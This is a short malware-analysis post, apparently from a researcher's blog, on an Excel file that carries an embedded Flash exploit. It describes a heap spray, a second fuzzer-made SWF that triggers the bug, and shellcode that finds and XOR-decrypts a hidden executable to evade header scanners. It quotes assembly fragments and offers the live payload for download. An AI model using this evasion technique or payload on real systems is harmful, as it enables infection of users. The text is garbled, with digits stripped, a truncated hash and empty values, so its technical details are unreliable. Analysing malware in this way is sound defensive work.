Then after days Adobe confirmed bug and released advisory
MD Hash: BBCDAFDAFADDE
My analysis of crsenvironscan.xls
There are no vulnerabilities in MS Office, there is a vulnerability in embeded swf as was described below.
) There are embeded swf
(target file name f:\sm.swf)
This swf provide heap spray and then load second swf
view source code
it allocates memory
NOP Slide =
then loads second swf.
) second.swf consist bug
File created possibly by using a fuzzer from
looks like there are bugs exist when flash player attempts to parse a swf file.
Unknown opcode . Unknown opcode .
(detailed analysis will be provided soon)
this is EmbededExec shellcode,not encrypted.
Shellcode search for exe between
cmp dword ptr [eax], E43h cmp dword ptr [eax+], 19890604h
hex code "e" and
cmp dword ptr [eax], B635546h cmp dword ptr [eax+], 19820424h
hex code "b"
if point view on this
as for me, that looks like some string and date
C.GB 1989/06/04 - it may mean 1989-06-04 Tiananmen, Beijing, China
FucK 1982/04/24 - ?
If you have any ideas, post in comments
Encryption of exe is interesting.
First bytes of exe header writed from shellcode
then encrypted date decrypts using this algo
where eax - size of exe
xor [ebx], al inc ebx dec eax inc ebx dec eax cmp eax,
This is for the first time I see such encryption in exploits found in the wild.
This is used to bypass scanners, which searches for the exe header.
Download Payload File a.exe
pass: infected Virustotal 0/43
Information from PEiD InstallShield AFW [CAB SFX]